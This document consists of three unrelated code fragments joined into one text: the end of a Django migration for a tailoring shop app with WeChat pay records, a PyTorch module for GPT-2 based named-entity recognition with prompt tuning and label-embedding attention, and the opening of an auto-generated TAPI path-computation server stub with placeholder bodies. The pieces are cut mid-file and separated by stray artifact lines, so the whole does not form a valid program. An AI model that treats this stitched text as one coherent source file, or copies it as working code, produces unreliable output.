('out_trade_no', models.CharField(max_length=128, null=True, verbose_name=b'\xe5\x95\x86\xe6\x88\xb7\xe8\xae\xa2\xe5\x8d\x95\xe5\x8f\xb7', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('result_code', models.CharField(max_length=16, null=True, verbose_name=b'\xe4\xb8\x9a\xe5\x8a\xa1\xe7\xbb\x93\xe6\x9e\x9c', blank=True)),
('return_code', models.CharField(max_length=16, null=True, verbose_name=b'\xe8\xbf\x94\xe5\x9b\x9e\xe7\x8a\xb6\xe6\x80\x81\xe7\xa0\x81', blank=True)),
('openid', models.CharField(default=b'', max_length=32, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe7\x94\xa8\xe6\x88\xb7\xe6\xa0\x87\xe8\xaf\x86')),
('total_fee', models.FloatField(default=0, null=True, verbose_name=b'\xe6\x80\xbb\xe9\x87\x91\xe9\xa2\x9d', blank=True)),
('trade_type', models.CharField(max_length=16, null=True, verbose_name=b'\xe4\xba\xa4\xe6\x98\x93\xe7\xb1\xbb\xe5\x9e\x8b', blank=True)),
('bank_type', models.CharField(max_length=16, null=True, verbose_name=b'\xe4\xbb\x98\xe6\xac\xbe\xe9\x93\xb6\xe8\xa1\x8c', blank=True)),
('appid', models.CharField(max_length=32, null=True, verbose_name=b'\xe5\x85\xac\xe4\xbc\x97\xe8\xb4\xa6\xe5\x8f\xb7', blank=True)),
('mch_id', models.CharField(max_length=32, null=True, verbose_name=b'\xe5\x95\x86\xe6\x88\xb7\xe5\x8f\xb7', blank=True)),
],
options={
'verbose_name': '\u5fae\u4fe1\u652f\u4ed8\u8bb0\u5f55',
'verbose_name_plural': '\u5fae\u4fe1\u652f\u4ed8\u8bb0\u5f55',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='XiaBaiChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u4e0b\u6446\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u4e0b\u6446\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='XiuKouChenShan',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u8896\u53e3\uff08\u886c\u886b\uff09',
'verbose_name_plural': '\u8896\u53e3\uff08\u886c\u886b\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='XiuKouShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u8896\u6263\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u8896\u6263\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='YaoDouShangYi',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
],
options={
'verbose_name': '\u8170\u515c\uff08\u4e0a\u8863\uff09',
'verbose_name_plural': '\u8170\u515c\uff08\u4e0a\u8863\uff09',
},
bases=('wap.clothparam',),
),
migrations.AddField(
model_name='redpacket',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='order',
name='product',
field=models.ForeignKey(verbose_name=b'\xe4\xba\xa7\xe5\x93\x81', blank=True, to='wap.Product'),
preserve_default=True,
),
migrations.AddField(
model_name='order',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User'),
preserve_default=True,
),
migrations.AddField(
model_name='order',
name='wxpay',
field=models.ForeignKey(verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\x94\xaf\xe4\xbb\x98\xe8\xae\xb0\xe5\xbd\x95', blank=True, to='wap.Wxpay', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='measurereservation',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='fabric',
name='product',
field=models.ForeignKey(verbose_name=b'\xe6\x89\x80\xe5\xb1\x9e\xe4\xba\xa7\xe5\x93\x81', blank=True, to='wap.Product', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='coupon',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='cart',
name='fabric',
field=models.ForeignKey(verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99', blank=True, to='wap.Fabric', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='cart',
name='product',
field=models.ForeignKey(verbose_name=b'\xe4\xba\xa7\xe5\x93\x81', blank=True, to='wap.Product'),
preserve_default=True,
),
migrations.AddField(
model_name='cart',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User'),
preserve_default=True,
),
migrations.AddField(
model_name='cart',
name='wxpay',
field=models.ForeignKey(verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\x94\xaf\xe4\xbb\x98\xe8\xae\xb0\xe5\xbd\x95', blank=True, to='wap.Wxpay', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='banner',
name='product',
field=models.ForeignKey(verbose_name=b'\xe6\x89\x80\xe5\xb1\x9e\xe4\xba\xa7\xe5\x93\x81', blank=True, to='wap.Product', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='address4order',
name='user',
field=models.ForeignKey(verbose_name=b'\xe7\x94\xa8\xe6\x88\xb7', blank=True, to='wap.User', null=True),
preserve_default=True,
),
]
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import CrossEntropyLoss
from losses.focal_loss import FocalLoss
from losses.label_smoothing import LabelSmoothingCrossEntropy
from .transformers_master.models.gpt2.modeling_gpt2 import GPT2Model as New_GPT2
from models.p_tuning.prompt_encoder import PromptEncoder
from torch.nn.utils.rnn import pad_sequence
from transformers import GPT2LMHeadModel
from models.p_tuning.label_embedder import LabelEmbeder
class GPT2SoftmaxForNer_LE(torch.nn.Module):
"""
One-step variant: outputs the hidden state for every input token in a single forward pass.
"""
def __init__(self, config, device, template, model_name=None):
super().__init__()
self.device = device
self.num_labels = config.num_labels
if model_name is None:  # model_name may also be set to gpt2-large
model_name = 'gpt2'
self.LMgpt2 = GPT2LMHeadModel.from_pretrained(model_name).to(self.device)
self.gpt2 = self.LMgpt2.base_model  # New_GPT2.from_pretrained(model_name).to(self.device); accepts both inputs_embeds and input_ids
self.embeddings = self.gpt2.get_input_embeddings().to(device)  # the embedding table shared with GPT2LMHeadModel
# self.embeddings.weight.requires_grad = False
# for param in self.gpt2.parameters():
# param.requires_grad = False
# perform fine_tuning
self.dropout = nn.Dropout(config.resid_pdrop).to(self.device)
self.classifier = nn.Linear(config.hidden_size, config.num_labels).to(self.device)
self.linear = nn.Linear(2*config.hidden_size, config.hidden_size).to(self.device)
self.loss_type = 'ce'
self.pseudo_token_id = 50257  # id of the pseudo prompt token
self.hidden_size = self.embeddings.embedding_dim
self.template = template
self.pad_token_id = 0
self.spell_length = sum(self.template)
self.prompt_encoder = PromptEncoder(self.template, self.hidden_size, device)
self.prompt_encoder = self.prompt_encoder.to(device)
self.num_entities = 9  # TODO: 9 entity labels for CoNLL-2003; distinguish BIO vs BIOES schemes
self.label_embedding = LabelEmbeder([self.num_entities], self.hidden_size, device).to(self.device)
self.attn_linear = nn.Linear(self.hidden_size, self.hidden_size).to(self.device)
self.fc = nn.Linear(self.hidden_size, 1, bias=False).to(self.device)
self.tanh = nn.Tanh().to(self.device)
self.softmax = nn.Softmax(dim=1).to(self.device)  # applied to [batch_size, num_entities] scores
self.linear_out = nn.Linear(2*self.hidden_size, self.hidden_size).to(self.device)
print("***************** init GPT2SoftmaxForNer with label embedding *********************")
def get_query(self, input_id, prompt_tokens):
input = []
prompt1 = []
prompt2 = []
count = 0
for i in range(self.template[0]):
prompt1.append(prompt_tokens[0])
for i in range(self.template[1]):
prompt2.append(prompt_tokens[0])
for i in range(len(input_id)):
if input_id[i] != 0:
count += 1
input.append(input_id[i].item())
if self.template[0] == self.template[1]:
query = prompt1 + input + prompt2 + input
else:
query = prompt1 + input + prompt2
return query, count
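A torch-free sketch of the query layout that `get_query` builds may help: prompt ids wrap the non-padded input ids, and when the two template halves are equal the input is repeated after the second prompt block. This is a hypothetical standalone helper (`build_query` is not part of the repository), shown under the assumption that padding id 0 marks the end of real input.

```python
# Hypothetical sketch of get_query's layout: [prompt1][input][prompt2][input?].
def build_query(input_ids, prompt_id, template):
    prompt1 = [prompt_id] * template[0]
    prompt2 = [prompt_id] * template[1]
    input_part = [tok for tok in input_ids if tok != 0]  # drop padding ids
    if template[0] == template[1]:
        # second copy of the input lets the model re-generate each token
        query = prompt1 + input_part + prompt2 + input_part
    else:
        query = prompt1 + input_part + prompt2
    return query, len(input_part)

query, count = build_query([15, 27, 42, 0, 0], prompt_id=50257, template=(2, 2))
# query = [50257, 50257, 15, 27, 42, 50257, 50257, 15, 27, 42], count = 3
```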
def embed_input(self, queries, counts):
"""
Turn the queries (word indices), shape [batch_size, query_length],
into embeddings, shape [batch_size, query_length, hidden_size].
"""
bz = queries.shape[0]
queries_for_embedding = queries.clone()
queries_for_embedding[(queries == self.pseudo_token_id)] = self.pseudo_token_id-1
replace_embeds = self.prompt_encoder()
raw_embeds = self.embeddings(queries_for_embedding)
for bidx in range(bz):
for i in range(self.template[0]):
raw_embeds[bidx, i, :] = replace_embeds[i, :]
for i in range(self.template[1]):
raw_embeds[bidx, i+counts[bidx]+self.template[0], :] = replace_embeds[i+self.template[0], :]
return raw_embeds
def attention(self, input_state, label_init, bz):
"""
Args:
input_state: [batch_size, hidden_size]
label_init: [num_label_type, hidden_size], broadcast to every batch element
Returns:
output_state:[batch_size, hidden state]
"""
label_embedding = torch.empty(bz, self.num_entities, self.hidden_size).to(self.device)# [bz, 5, hs]
for k in range(bz):
label_embedding[k, :, :] = label_init
input_state_attn = self.attn_linear(input_state).unsqueeze(2)
input_state_attn = self.tanh(input_state_attn)# [bz, hs, 1]
weights = torch.bmm(label_embedding, input_state_attn).squeeze(2)# [bz, 5, hs] x [bz, hs, 1] -> [bz, 5]: one score per label type
weights = self.softmax(weights)
c_t = torch.bmm(weights.unsqueeze(1), label_embedding).squeeze(1)# [bz, 1, 5] x [bz, 5, hs] -> [bz, hs] = sum_i(w_i * label_i)
output = self.tanh(self.linear_out(torch.cat([c_t, input_state], 1)))
return output
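The core of the attention above is: score the token state against each label embedding, softmax the scores, and mix the label embeddings by those weights. A hypothetical pure-Python sketch of that math (single example, no torch, dot-product scoring in place of the learned linear layer) makes the shapes concrete:

```python
import math

# Hypothetical torch-free sketch of the label-attention math:
# one token state, a list of label embeddings, softmaxed dot-product weights.
def label_attention(state, label_embs):
    scores = [sum(s * e for s, e in zip(state, emb)) for emb in label_embs]  # one score per label
    m = max(scores)
    exps = [math.exp(x - m) for x in scores]
    weights = [x / sum(exps) for x in exps]                                  # softmax over labels
    context = [sum(w * emb[d] for w, emb in zip(weights, label_embs))
               for d in range(len(state))]                                   # sum_i w_i * label_i
    return weights, context

weights, context = label_attention([1.0, 0.0], [[1.0, 0.0], [0.0, 1.0], [-1.0, 0.0]])
# weights sum to 1; the label most aligned with the state gets the largest weight
```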
# def attention(self, input_state, label_embedding, bz):
# """
# Args:
# input_state: [batch_size, hidden state]
# label_embedding: [batch_size, num_label_type, hidden state]
#
# Returns:
# output_state:[batch_size, hidden state]
# """
# input_state_attn = self.attn_linear(input_state)
# input_state_expanded = input_state_attn.unsqueeze(1).expand(bz, self.num_entities, self.hidden_size).contiguous() # B x 5 x hidden_dim
# input_state_expanded = input_state_expanded.view(-1, self.hidden_size) # B*5 x hidden_dim
#
# label_embedding_fea = label_embedding.view(-1, self.hidden_size)
# att_features = label_embedding_fea + input_state_expanded # B*self.num_entities x hidden_dim
# e = torch.tanh(att_features)
# scores = self.fc(e) # B*self.num_entities x 1
# scores = scores.view(-1, self.num_entities) # B x self.num_entities
# attn_dist_ = F.softmax(scores, dim=1) # B x self.num_entities
# normalization_factor = attn_dist_.sum(1, keepdim=True)
# attn_dist = attn_dist_ / normalization_factor
# attn_dist = attn_dist.unsqueeze(1) # B x 1 x self.num_entities
# output_state = torch.bmm(attn_dist, label_embedding) # B x 1 x self.num_entities * self.num_entities x hidden_dim
#
# output_state = output_state.squeeze(1)
# output_state += input_state
# return output_state
# def add_label_embedding(self, sequence_output, label_init, counts=None):
# """
# Args:
# sequence_output: the input embeds or the gpt2 output logits
# Returns:
# output: add label embedding to input embeds
#
# """
# bz = sequence_output.shape[0]
# new_sequence_output = torch.zeros_like(sequence_output).to(self.device)
# label_embedding = torch.empty(bz, self.num_entities, self.hidden_size).to(self.device)
#
# for k in range(bz):
# label_embedding[k, :, :] = label_init
#
# for i in range(sequence_output.shape[1]):
# new_sequence_output[:, i, :] = self.attention(sequence_output[:, i, :], label_embedding, bz)
# # donot use a = ...a , which will trigger error during loss.backward() cause this assigns value to one variable repeatedly
#
# for bidx in range(bz):
# # input ids 对应的embedding不变
# new_sequence_output[bidx, self.template[0]:counts[bidx]+self.template[0], :] =\
# sequence_output[bidx, self.template[0]:counts[bidx]+self.template[0], :]
#
# return new_sequence_output
def add_label_embedding(self, sequence_output, label_init):
"""
Args:
sequence_output: the output hidden state from gpt2 model [batch_size, sequence_length, 768]
Returns:
output: add label embedding to sequence_output [batch_size, sequence_length, 768]
"""
bz = sequence_output.shape[0]
new_sequence_output = torch.empty(sequence_output.shape).to(self.device)
for i in range(sequence_output.shape[1]):
new_sequence_output[:, i, :] = self.attention(sequence_output[:, i, :], label_init, bz)
return new_sequence_output
def forward(self, input_ids, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, labels=None):
"""
Args:
input_ids: padded sequence: [batch_size, max_length]
for Chinese text: input_ids = [101, ..., 102, 0, ..., 0]
attention_mask: [batch_size, max_length]
token_type_ids: [batch_size, max_length]
position_ids: [batch_size, max_length]
head_mask: [batch_size, max_length]
labels: [batch_size, max_length]
Returns:
outputs
"""
label_init = self.label_embedding()
bz = len(input_ids)  # batch size
bx = len(input_ids[0])  # padded sequence length
prompt_tokens = [self.pseudo_token_id]
counts = []
queries = []
for i in range(bz):
query, count = self.get_query(input_ids[i], prompt_tokens)
counts.append(count)
queries.append(torch.LongTensor(query).squeeze(0))
queries = pad_sequence(queries, True, padding_value=self.pad_token_id).long().to(self.device)
attention_mask1 = queries != self.pad_token_id
inputs_embeds = self.embed_input(queries, counts)
inputs = inputs_embeds.to(self.device)
outputs = self.gpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
# decode the LM output ids to see whether they show any pattern
outputs2 = self.LMgpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
example = torch.argsort(outputs2[0], dim=2, descending=True)[:, sum(self.template)+max(counts):, 0].to(self.device)
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
sequence = torch.zeros(bz, bx, self.hidden_size).to(self.device)
for bdix in range(bz):
if self.template[0] == self.template[1]:
place = sum(self.template)+counts[bdix]  # e.g. template=(6, 6), count=32 -> place = 44
else:
place = self.template[0] + counts[bdix]
sequence[bdix, :counts[bdix], :] = sequence_output[bdix, place:place+counts[bdix], :]
# TODO: only slice the positions that correspond to non-padded input ids
# add label embedding
new_sequence = self.add_label_embedding(sequence, label_init)
logits = self.classifier(new_sequence)
outputs = (example,)+outputs[2:]
outputs = (logits,) + outputs # add hidden states and attention if they are here
if labels is not None:
assert self.loss_type in ['lsr', 'focal', 'ce']
if self.loss_type == 'lsr':
loss_fct = LabelSmoothingCrossEntropy()
elif self.loss_type == 'focal':
loss_fct = FocalLoss()
else:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.contiguous().view(-1) == 1
active_logits = logits.contiguous().view(-1, self.num_labels)[active_loss]
active_labels = labels.contiguous().view(-1)[active_loss]
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.contiguous().view(-1, self.num_labels), labels.contiguous().view(-1))
outputs = (loss,) + outputs
return outputs
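The forward above slices, out of the hidden states for [prompt1][input][prompt2][input], the span that aligns with the second copy of the input: it starts at sum(template) + count. A hypothetical index sketch (`second_copy_span` is illustrative, not from the repository):

```python
# Hypothetical sketch of the slicing arithmetic in forward: the hidden states
# of the second input copy start after both prompt blocks and the first copy.
def second_copy_span(template, count):
    start = template[0] + count + template[1]  # == sum(template) + count
    return start, start + count

start, end = second_copy_span((6, 6), 32)
# start = 44, end = 76: hidden states [44:76] align with the 32 input tokens
```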
class GPT2generateForNer_LE(torch.nn.Module):
"""
Loop variant: generates the hidden states step by step and adds the label embedding to the output of every step.
"""
def __init__(self, config, device, template, model_name=None):
super().__init__()
self.device = device
self.num_labels = config.num_labels
if model_name is None:  # model_name may also be set to gpt2-large
model_name = 'gpt2'
self.LMgpt2 = GPT2LMHeadModel.from_pretrained(model_name).to(self.device)
self.gpt2 = self.LMgpt2.base_model  # New_GPT2.from_pretrained(model_name).to(self.device); accepts both inputs_embeds and input_ids
self.embeddings = self.gpt2.get_input_embeddings().to(device)  # the embedding table shared with GPT2LMHeadModel
# self.embeddings.weight.requires_grad = False
# for param in self.gpt2.parameters():
# param.requires_grad = False
self.dropout = nn.Dropout(config.resid_pdrop).to(self.device)
self.classifier = nn.Linear(config.hidden_size, config.num_labels).to(self.device)
self.linear = nn.Linear(2*config.hidden_size, config.hidden_size).to(self.device)
self.loss_type = 'ce'
self.pseudo_token_id = 50257  # id of the pseudo prompt token
self.hidden_size = self.embeddings.embedding_dim
self.template = template
self.pad_token_id = 0
self.spell_length = sum(self.template)
self.prompt_encoder = PromptEncoder(self.template, self.hidden_size, device)
self.prompt_encoder = self.prompt_encoder.to(device)
self.num_entities = 9  # TODO: 9 entity labels for CoNLL-2003; distinguish BIO vs BIOES schemes
self.label_embedding = LabelEmbeder([self.num_entities], self.hidden_size, device).to(self.device)
self.label_embedding = self.label_embedding.to(self.device)
self.attn_linear = nn.Linear(self.hidden_size, self.hidden_size).to(self.device)
self.fc = nn.Linear(self.hidden_size, 1, bias=False).to(self.device)
self.tanh = nn.Tanh().to(self.device)
self.softmax = nn.Softmax(dim=1).to(self.device)  # applied to [batch_size, num_entities] scores
self.linear_out = nn.Linear(2*self.hidden_size, self.hidden_size).to(self.device)
print("***************** init GPT2SoftmaxForNer with label embedding *********************")
print("**************** generate hidden state in a loop ****************")
print("***************** "+str(model_name) + " *********************")
print("************** num_labels *** "+str(self.num_labels) + " *********************")
def get_query(self, input_id, prompt_tokens):
input = []
prompt1 = []
prompt2 = []
count = 0
for i in range(self.template[0]):
prompt1.append(prompt_tokens[0])
for i in range(self.template[1]):
prompt2.append(prompt_tokens[0])
for i in range(len(input_id)):
if input_id[i] != 0:
count += 1
input.append(input_id[i].item())
query = prompt1 + input + prompt2
return query, count
def embed_input(self, queries, counts):
"""
Turn the queries (word indices), shape [batch_size, query_length],
into embeddings, shape [batch_size, query_length, hidden_size].
"""
bz = queries.shape[0]
queries_for_embedding = queries.clone()
queries_for_embedding[(queries == self.pseudo_token_id)] = self.pseudo_token_id-1
replace_embeds = self.prompt_encoder()
raw_embeds = self.embeddings(queries_for_embedding)
for bidx in range(bz):
for i in range(self.template[0]):
raw_embeds[bidx, i, :] = replace_embeds[i, :]
for i in range(self.template[1]):
raw_embeds[bidx, i+counts[bidx]+self.template[0], :] = replace_embeds[i+self.template[0], :]
return raw_embeds
def attention(self, input_state, label_init, bz):
"""
Args:
input_state: [batch_size, hidden_size]
label_init: [num_label_type, hidden_size], broadcast to every batch element
Returns:
output_state:[batch_size, hidden state]
"""
label_embedding = torch.empty(bz, self.num_entities, self.hidden_size).to(self.device)# [bz, 5, hs]
for k in range(bz):
label_embedding[k, :, :] = label_init
input_state_attn = self.attn_linear(input_state).unsqueeze(2)
input_state_attn = self.tanh(input_state_attn)# [bz, hs, 1]
weights = torch.bmm(label_embedding, input_state_attn).squeeze(2)# [bz, 5, hs] x [bz, hs, 1] -> [bz, 5]: one score per label type
weights = self.softmax(weights)
c_t = torch.bmm(weights.unsqueeze(1), label_embedding).squeeze(1)# [bz, 1, 5] x [bz, 5, hs] -> [bz, hs] = sum_i(w_i * label_i)
output = self.tanh(self.linear_out(torch.cat([c_t, input_state], 1)))
return output
# def old_attention(self, input_state, label_init, bz):
# """
# Args:
# input_state: [batch_size, hidden state]
# label_embedding: [batch_size, num_label_type, hidden state]
#
# Returns:
# output_state:[batch_size, hidden state]
# """
# label_embedding = torch.empty(bz, self.num_entities, self.hidden_size).to(self.device)
# for k in range(bz):
# label_embedding[k, :, :] = label_init
#
# input_state_attn = self.attn_linear(input_state)
# input_state_expanded = input_state_attn.unsqueeze(1).expand(bz, self.num_entities, self.hidden_size).contiguous() # B x 5 x hidden_dim
# input_state_expanded = input_state_expanded.view(-1, self.hidden_size) # B*5 x hidden_dim
#
# label_embedding_fea = label_embedding.view(-1, self.hidden_size)
#
# #
# att_features = label_embedding_fea + input_state_expanded # B*self.num_entities x hidden_dim
# e = torch.tanh(att_features)
# scores = self.fc(e) # B*self.num_entities x 1
# scores = scores.view(-1, self.num_entities) # B x self.num_entities
# attn_dist_ = F.softmax(scores, dim=1) # B x self.num_entities
# normalization_factor = attn_dist_.sum(1, keepdim=True)
# attn_dist = attn_dist_ / normalization_factor
# attn_dist = attn_dist.unsqueeze(1) # B x 1 x self.num_entities
# output_state = torch.bmm(attn_dist, label_embedding) # B x 1 x self.num_entities * B x self.num_entities x hidden_dim
#
# output_state = output_state.squeeze(1)
# output_state += input_state
# return output_state
def add_label_embedding(self, sequence_output, label_init):
"""
Args:
sequence_output: the output hidden state from gpt2 model [batch_size, 1, 768]
Returns:
output: add label embedding to sequence_output [batch_size, 1, 768]
"""
bz = sequence_output.shape[0]
new_sequence_output = self.attention(sequence_output, label_init, bz)
return new_sequence_output
    def forward(self, input_ids, attention_mask=None, token_type_ids=None,
                position_ids=None, head_mask=None, labels=None):
        """
        Args:
            input_ids: padded sequence: [batch_size, max_length]
                if Chinese: input_ids = [101, ..., 102, 0, ..., 0]
            attention_mask: [batch_size, max_length]
            token_type_ids: [batch_size, max_length]
            position_ids: [batch_size, max_length]
            head_mask: [batch_size, max_length]
            labels: [batch_size, max_length]
        Returns:
            outputs
        """
        label_init = self.label_embedding()
        bz = len(input_ids)  # batch_size
        prompt_tokens = [self.pseudo_token_id]
        counts = []
        queries = []
        for i in range(bz):
            query, count = self.get_query(input_ids[i], prompt_tokens)
            counts.append(count)
            queries.append(torch.LongTensor(query).squeeze(0))
        queries = pad_sequence(queries, True, padding_value=self.pad_token_id).long().to(self.device)
        attention_mask1 = queries != self.pad_token_id
        inputs_embeds = self.embed_input(queries, counts)
        inputs = inputs_embeds.to(self.device)
        outputs = self.gpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
        outputs2 = self.LMgpt2(inputs_embeds=inputs, attention_mask=attention_mask1.to(self.device).half())
        example = torch.argsort(outputs2[0], dim=2, descending=True)[:, sum(self.template) + max(counts):, 0]
        sequence_output = outputs[0][..., -1, :]  # [batch_size, 768]
        past_key_values = outputs.past_key_values
        assert outputs[0][0][0][0] == outputs.last_hidden_state[0][0][0]
        sequence = torch.zeros(input_ids.shape[0], input_ids.shape[1], self.hidden_size).to(self.device)
        # first token
        new_sequence_output = self.add_label_embedding(sequence_output, label_init)
        sequence[:, 0, :] = new_sequence_output
        # loop over the remaining steps, reusing the cached key/values
        for round in range(1, max(counts)):
            input_this_step = inputs[:, self.template[0] + round - 1:self.template[0] + round, :]
            outputs = self.gpt2(inputs_embeds=input_this_step,
                                past_key_values=past_key_values, return_dict=None)
            sequence_output = outputs[0][..., -1, :]
            past_key_values = outputs.past_key_values
            new_sequence_output = self.add_label_embedding(sequence_output, label_init)
            sequence[:, round, :] = new_sequence_output
        sequence = self.dropout(sequence)
        logits = self.classifier(sequence)
        outputs = (example,) + outputs[2:]
        outputs = (logits,) + outputs  # add hidden states and attention if they are here
        if labels is not None:
            assert self.loss_type in ['lsr', 'focal', 'ce']
            if self.loss_type == 'lsr':
                loss_fct = LabelSmoothingCrossEntropy()
            elif self.loss_type == 'focal':
                loss_fct = FocalLoss()
            else:
                loss_fct = CrossEntropyLoss()
            # Only keep active parts of the loss
            if attention_mask is not None:
                active_loss = attention_mask.contiguous().view(-1) == 1
                active_logits = logits.contiguous().view(-1, self.num_labels)[active_loss]
                active_labels = labels.contiguous().view(-1)[active_loss]
                loss = loss_fct(active_logits, active_labels)
            else:
                loss = loss_fct(logits.contiguous().view(-1, self.num_labels), labels.contiguous().view(-1))
            outputs = (loss,) + outputs
        return outputs  # (loss), scores, (hidden_states), (attentions)
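# Illustrative sketch (not part of the model above): the label attention is a
# softmax-weighted convex combination of label embeddings, c_t = sum_i w_i * label_i,
# which torch.bmm computes batch-wise. The toy sizes below are made up for demonstration.

```python
import math


def label_attention(scores, label_embedding):
    """scores: [num_labels]; label_embedding: [num_labels][hidden] -> [hidden]."""
    exps = [math.exp(s - max(scores)) for s in scores]  # numerically stable softmax
    total = sum(exps)
    weights = [e / total for e in exps]
    hidden = len(label_embedding[0])
    # weighted sum over labels, mirroring torch.bmm(weights.unsqueeze(1), label_embedding)
    return [sum(weights[i] * label_embedding[i][j] for i in range(len(weights)))
            for j in range(hidden)]


if __name__ == "__main__":
    labels = [[1.0, 0.0, 0.0, 0.0],
              [0.0, 1.0, 0.0, 0.0],
              [0.0, 0.0, 1.0, 0.0]]
    c_t = label_attention([2.0, 0.0, 0.0], labels)
    # weights sum to 1, so c_t stays inside the convex hull of the label vectors
    assert abs(sum(c_t) - 1.0) < 1e-9
```

Because the weights sum to one, the pooled vector can never leave the span of the label embeddings, which is why the model then concatenates it with `input_state` before the output projection.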
import connexion
import six
from tapi_server.models.inline_object import InlineObject # noqa: E501
from tapi_server.models.inline_object11 import InlineObject11 # noqa: E501
from tapi_server.models.inline_object26 import InlineObject26 # noqa: E501
from tapi_server.models.tapi_common_bandwidth_profile import TapiCommonBandwidthProfile # noqa: E501
from tapi_server.models.tapi_common_capacity import TapiCommonCapacity # noqa: E501
from tapi_server.models.tapi_common_capacity_value import TapiCommonCapacityValue # noqa: E501
from tapi_server.models.tapi_common_name_and_value import TapiCommonNameAndValue # noqa: E501
from tapi_server.models.tapi_common_service_interface_point_ref import TapiCommonServiceInterfacePointRef # noqa: E501
from tapi_server.models.tapi_path_computation_compute_p2_p_path import TapiPathComputationComputeP2PPath # noqa: E501
from tapi_server.models.tapi_path_computation_delete_p2_p_path import TapiPathComputationDeleteP2PPath # noqa: E501
from tapi_server.models.tapi_path_computation_optimize_p2_p_path import TapiPathComputationOptimizeP2PPath # noqa: E501
from tapi_server.models.tapi_path_computation_path import TapiPathComputationPath # noqa: E501
from tapi_server.models.tapi_path_computation_path_computation_context import TapiPathComputationPathComputationContext # noqa: E501
from tapi_server.models.tapi_path_computation_path_computation_service import TapiPathComputationPathComputationService # noqa: E501
from tapi_server.models.tapi_path_computation_path_objective_function import TapiPathComputationPathObjectiveFunction # noqa: E501
from tapi_server.models.tapi_path_computation_path_optimization_constraint import TapiPathComputationPathOptimizationConstraint # noqa: E501
from tapi_server.models.tapi_path_computation_path_ref import TapiPathComputationPathRef # noqa: E501
from tapi_server.models.tapi_path_computation_path_service_end_point import TapiPathComputationPathServiceEndPoint # noqa: E501
from tapi_server.models.tapi_path_computation_routing_constraint import TapiPathComputationRoutingConstraint # noqa: E501
from tapi_server.models.tapi_path_computation_topology_constraint import TapiPathComputationTopologyConstraint # noqa: E501
from tapi_server.models.tapi_topology_cost_characteristic import TapiTopologyCostCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_latency_characteristic import TapiTopologyLatencyCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_link_ref import TapiTopologyLinkRef # noqa: E501
from tapi_server.models.tapi_topology_node_ref import TapiTopologyNodeRef # noqa: E501
from tapi_server.models.tapi_topology_risk_characteristic import TapiTopologyRiskCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_topology_ref import TapiTopologyTopologyRef # noqa: E501
from tapi_server import util
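# Illustrative sketch (not part of the generated module): every POST/PUT stub below
# follows the same deserialize-then-store pattern via Model.from_dict. The names
# `PATH_SERVICES`, `FakeModel`, and `example_post_handler` are made-up stand-ins so
# the sketch runs without connexion; a real handler would use connexion.request.

```python
PATH_SERVICES = {}  # hypothetical in-memory store keyed by service uuid


class FakeModel:
    """Stand-in for a generated model class with a from_dict constructor."""

    @classmethod
    def from_dict(cls, d):
        obj = cls()
        obj.__dict__.update(d)
        return obj


def example_post_handler(body):
    """Deserialize the JSON body and index the resulting service by its uuid."""
    service = FakeModel.from_dict(body)
    PATH_SERVICES[service.uuid] = service
    return None, 201  # connexion maps a (body, status) tuple to the HTTP response
```

Filling in the stubs below amounts to replacing `return 'do some magic!'` with logic of this shape against the real model classes.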
def data_context_path_computation_context_delete():  # noqa: E501
    """data_context_path_computation_context_delete

    removes tapi.path.computation.PathComputationContext # noqa: E501


    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_get():  # noqa: E501
    """data_context_path_computation_context_get

    returns tapi.path.computation.PathComputationContext # noqa: E501


    :rtype: TapiPathComputationPathComputationContext
    """
